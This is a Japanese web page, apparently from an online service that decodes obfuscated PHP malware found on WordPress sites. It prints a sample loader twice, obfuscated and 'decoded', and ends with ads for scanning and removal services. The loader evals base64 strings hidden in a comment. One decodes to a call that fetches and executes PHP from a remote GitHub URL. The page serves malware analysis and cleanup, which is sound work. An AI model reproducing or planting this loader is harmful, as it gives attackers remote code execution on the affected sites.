PHP 難読化コードの復元・デコード

Wordpress　等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php error_reporting(0); /* |--ZXZhbChzdHJfcmVwbGFjZSgiPD9waHAiLCIiLGZpbGVfZ2V0X2NvbnRlbnRzKCJhcHAucGhwIikpKTsR2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFkR2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFkR2...

難読化されたPHPコード

<?php
error_reporting(0);
/*
|--ZXZhbChzdHJfcmVwbGFjZSgiPD9waHAiLCIiLGZpbGVfZ2V0X2NvbnRlbnRzKCJhcHAucGhwIikpKTsR2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFkR2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFkR2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFkR2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFkR2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFk--|
|--ZXZhbChzdHJfcmVwbGFjZSgiPD9waHAiLCIiLGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vemJzZXJ2ZXIvemVyb2JvdC9yZWZzL2hlYWRzL21haW4vYXBwL2FwcC5waHAiKSkpOw==--|
|--R2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFk--|
*/
$R2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFk=explode("--|",explode("|--",file_get_contents("server.php"))[2])[0];
eval(base64_decode($R2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFk));

デコード(難読化解除)されたコード

<?php

error_reporting(0);
/*
|--ZXZhbChzdHJfcmVwbGFjZSgiPD9waHAiLCIiLGZpbGVfZ2V0X2NvbnRlbnRzKCJhcHAucGhwIikpKTsR2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFkR2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFkR2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFkR2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFkR2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFk--|
|--ZXZhbChzdHJfcmVwbGFjZSgiPD9waHAiLCIiLGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vemJzZXJ2ZXIvemVyb2JvdC9yZWZzL2hlYWRzL21haW4vYXBwL2FwcC5waHAiKSkpOw==--|
|--R2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFk--|
*/
$R2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFk = explode("--|", explode("|--", file_get_contents("server.php"))[2])[0];
eval(base64_decode($R2V0UG9zdFJlcXVpcmVIdHRwWmVyb2JvdFNlcnZlck9wZW5aaXBSYXJJbmNsdWRlUmVxdWlyZW9uY2VTdWJtaXRIZWFk));

■【無料】ワードプレス:マルウェアスキャン＆セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策カスタマイズや修正、引っ越し・復旧のご依頼承ります